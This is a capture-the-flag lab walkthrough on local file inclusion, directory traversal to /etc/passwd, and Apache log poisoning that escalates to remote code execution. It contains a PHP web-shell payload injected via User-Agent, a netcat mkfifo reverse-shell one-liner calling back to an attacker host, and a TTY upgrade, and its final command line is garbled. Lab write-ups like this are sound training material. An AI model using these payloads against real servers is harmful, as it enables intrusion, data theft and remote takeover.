[Task 1] Local File Inclusion
- Start the VM and access it using your browser
2. Access the first walkthrough, and add a parameter at the end of the link named “?page=”.
3. Let’s include the home page. At the “?page=” parameter enter home.html to include the home page.
4. What’s the message you get when you include the home.html?
ANS: It’s in #3
5. You can also read other system files. For example, you can read the passwd file. Type /etc/passwd in the parameter to read it.
View page source for easier viewing
6. What user that it’s not by default there is present?
7. Well done! You’ve exploited your first local file inclusion!
[Task 2] Local File Inclusion using Directory Traversal
- Now that we know what Directory Traversal is, let’s access the second walkthrough.
- Add the “?page=” parameter, and try to include the home page again. Does it work (Yes/No)?
ANS: No
3. Suppose you have another page named “creditcard”, but it’s which is in another directory. Let’s try finding it. Navigate one directory up, and try to include the file. Use “../” to move one directory up.
4. What are the credit card numbers?
ANS: It’s in #3
5. The same way you can include the passwd file. You’ll have to move more directories up. Try reading the passwd file.
6. Well done! You’ve exploited your first LFI using Directory Traversal.
[Task 3] Reaching RCE using LFI and log poisoning
- We got our hands a bit dirty with basic LFI and LFI using path traversal. Let’s dig a little deeper, and use log poisoning to get access to the underlying operating system.
- We will inject some malicious php code into the server’s log.
Note: In order for that to happen, the directory should have read and execute permissions.
3. Access the third walkthrough, add the “?page=” parameter and let’s try reading the apache log file.
The log file is located at the following path: /var/log/apache2/access.log
Access “/var/log/apache2/access.log”
View page source for easier viewing
4. Can you read the log (Yes/No)?
ANS: Yes
5. Since you can do it, let’s “poison” it!
Intercept the request with Burp Suite
Edit User-Agent with php code
<?php system($_GET['lfi']) ?>
Add lfi parameter to the request
Send the request to the Repeater (CTRL+R)
Add whoami to the lfi value
Here’s the result. User is “www-data”.
6. Give it a try and run uname -r. What’s the output of the command?
I remove all User-Agent’ text except php code. I also replace space in uname -r with “%20” like this
uname%20-r
7. With this knowledge read the flag from the lfi user home directory.
I will get reverse shell.
Reference: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
Create listener on port 1234
nc -lvp 1234
Paste reverse shell command
After a lot of attempts. I succeeded with this command
Note: I had to send the request with each command at least twice to make sure if It’s working or not, and finally got the shell.
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ip> 1234 >/tmp/f
Encode to url with Burp Suite Decoder
Copy to the request and send
Now I have shell.
Import TTY shell
python -c 'import pty;pty.spawn("/bin/bash");'
Get the flag
cd /homelscd lfilscat flag.txt
